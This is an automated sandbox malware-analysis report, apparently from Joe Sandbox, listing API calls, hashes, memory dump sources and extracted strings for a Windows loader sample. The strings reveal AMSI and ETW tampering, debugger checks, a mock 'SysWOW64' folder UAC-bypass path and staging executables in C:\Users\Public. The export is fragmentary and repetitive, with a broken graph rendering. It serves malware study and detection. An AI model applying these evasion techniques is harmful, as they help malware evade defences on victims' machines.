                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                          • Opcode ID: d3f22be55d97564aa8bc82122ec76cead66e58f184b73e0299c99f45466b3325
                                                                                                                                          • Instruction ID: 0eddc6224fcea4d219edb7da31743888b7adef5f21e06164c1fd1a1920280c24
                                                                                                                                          • Opcode Fuzzy Hash: d3f22be55d97564aa8bc82122ec76cead66e58f184b73e0299c99f45466b3325
                                                                                                                                          • Instruction Fuzzy Hash: BD411D75A90248AFEF10EBA9DA51ADEB3FAFF8C704F104436E041A7254DE74AD028F55

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                          • Opcode ID: 742d31d188f3ea91dc9d776f85773cd34526238241c8e3959c46a42baf693085
                                                                                                                                          • Instruction ID: 04ad797ea940bfaea9401290f9688fa28aade0376696c0be490d7b5351d258b5
                                                                                                                                          • Opcode Fuzzy Hash: 742d31d188f3ea91dc9d776f85773cd34526238241c8e3959c46a42baf693085
                                                                                                                                          • Instruction Fuzzy Hash: 9A110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                          • Opcode ID: 42b869670b61f886564bd27b43a244be5515e0f46536e85ea6171e16a4d1347c
                                                                                                                                          • Instruction ID: 2647ba031a1c38a3953d0cf44aa726fed76ba51fdcf0c3a707fb999508d70046
                                                                                                                                          • Opcode Fuzzy Hash: 42b869670b61f886564bd27b43a244be5515e0f46536e85ea6171e16a4d1347c
                                                                                                                                          • Instruction Fuzzy Hash: 57110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                          • Opcode ID: c53333de91fa3d573b471527e04e806a9ea3428949a26faa17a86ee5d537de26
                                                                                                                                          • Instruction ID: ef0f46fceccbe5f677d9978b27796da11b1ddd517faa3ce606eb5e7e15fdd48c
                                                                                                                                          • Opcode Fuzzy Hash: c53333de91fa3d573b471527e04e806a9ea3428949a26faa17a86ee5d537de26
                                                                                                                                          • Instruction Fuzzy Hash: 6901D775680208AFDB10EF99ED61E9FB7EDEB49700F508850B905D7640DF34AE128F64
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02AA6DB9,?,?,?,00000000), ref: 02AA6D99
                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02AA6EAC,00000000,00000000,02AA6E2B,?,00000000,02AA6E9B), ref: 02AA6E17
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                          • Opcode ID: f6cd0555e5ebc94e1a3651e3f49869c1e6d51af12e6169cfd13a2ca374733b29
                                                                                                                                          • Instruction ID: 5da60c8a7642921ffd3f14fe0417ff1a0b49b213c52b7310565aea6a1513d8ec
                                                                                                                                          • Opcode Fuzzy Hash: f6cd0555e5ebc94e1a3651e3f49869c1e6d51af12e6169cfd13a2ca374733b29
                                                                                                                                          • Instruction Fuzzy Hash: E601DF71648B04AEEF21EF61DD3296BBBEDEB49F10B550835F405E3680EF3199008C60
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAADA9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2242398760-0
                                                                                                                                          • Opcode ID: 63dbec516d5c11326e34e7f512299182b6d9b72938760f98e90687eba65359d1
                                                                                                                                          • Instruction ID: a6c4400fa7d12a5be8884a629221218b35a0111e5b7a44fba6f6704e5c5565b6
                                                                                                                                          • Opcode Fuzzy Hash: 63dbec516d5c11326e34e7f512299182b6d9b72938760f98e90687eba65359d1
                                                                                                                                          • Instruction Fuzzy Hash: C9C08CA375222057DA2067F82CD8AC387DDCD4A1F730408A2FA48E3103DF258C50E2E0
                                                                                                                                          APIs
                                                                                                                                          • InetIsOffline.URL(00000000,00000000,02ABB784,?,?,?,00000000,00000000), ref: 02AAF801
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                            • Part of subcall function 02AAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02AAFAEB,UacInitialize,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize), ref: 02AAF6EE
                                                                                                                                            • Part of subcall function 02AAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02AAF700
                                                                                                                                            • Part of subcall function 02AAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02AAF754
                                                                                                                                            • Part of subcall function 02AAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02AAF766
                                                                                                                                            • Part of subcall function 02AAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02AAF77D
                                                                                                                                            • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
                                                                                                                                            • Part of subcall function 02A9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C0B8B8,?,02AB0751,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession), ref: 02A9C37B
                                                                                                                                            • Part of subcall function 02AADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDAB
                                                                                                                                            • Part of subcall function 02AADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDDB
                                                                                                                                            • Part of subcall function 02AADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02AADDF0
                                                                                                                                            • Part of subcall function 02AADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02AADE1C
                                                                                                                                            • Part of subcall function 02AADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02AADE25
                                                                                                                                            • Part of subcall function 02A97E80: GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,Initialize), ref: 02A97E8B
                                                                                                                                            • Part of subcall function 02A98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02AB370D,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,Initialize,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8), ref: 02A98055
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                           • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                          • API String ID: 297057983-2644593349
                                                                                                                                          • Opcode ID: 1da6d27bbf690cada370ee3d7271cc77b4cb469e8686ccbdbcf4ac6481adb55c
                                                                                                                                          • Instruction ID: 27198bc3699c56301c52e75fc529a85c42d1e6d2ce73bc992d4aaff11bc3d6aa
                                                                                                                                          • Opcode Fuzzy Hash: 1da6d27bbf690cada370ee3d7271cc77b4cb469e8686ccbdbcf4ac6481adb55c
                                                                                                                                          • Instruction Fuzzy Hash: 67141975A8411CDFDF21EB65DE90ACA73FABF89304F5044E29409AB614DE30AE92CF51

                                                                                                                                           Control-flow Graph
                                                                                                                                           • Executed
                                                                                                                                           • Not Executed
                                                                                                                                           (graph rendering not recoverable from the text export)
call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8590->9124 9125 2ab8ba2-2ab8bb4 call 2aa8730 8590->9125 8807->8808 8834->8835 8835->8400 8874->8875 9124->8220 9125->9124
APIs
  • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
  • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
  • Part of subcall function 02AADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
  • Part of subcall function 02AADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
  • Part of subcall function 02AADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
• Sleep.KERNEL32(000003E8,ScanBuffer,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,02ABBB30,00000000,00000000,02ABBB24,00000000,00000000), ref: 02AB40CB
  • Part of subcall function 02AA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
  • Part of subcall function 02AA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
• Sleep.KERNEL32(000003E8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,000003E8,ScanBuffer,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB4277
  • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
  • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
  • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
• Sleep.KERNEL32(00004E20,UacScan,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacInitialize,02B17380,02ABB7B8), ref: 02AB50EE
  • Part of subcall function 02AADC04: RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
  • Part of subcall function 02AADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
  • Part of subcall function 02AADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
  • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
  • Part of subcall function 02AA85BC: WinExec.KERNEL32(?,?), ref: 02AA8624
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
• String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
• API String ID: 2171786310-3926298568
• Opcode ID: f8dafe48739b20289de976d04700f98ebd85f766bc7b9fa16b234cb6315b6d0d
• Instruction ID: 2e2a36cba21eeda616de393a87da4bcbaa311a35d16b3517f07708dfbe67a81f
• Opcode Fuzzy Hash: f8dafe48739b20289de976d04700f98ebd85f766bc7b9fa16b234cb6315b6d0d
• Instruction Fuzzy Hash: FC432875A8015CDFDF21EB65DE90ACA73FABF89304F5044E29408AB614DE70AE92CF51

Control-flow Graph

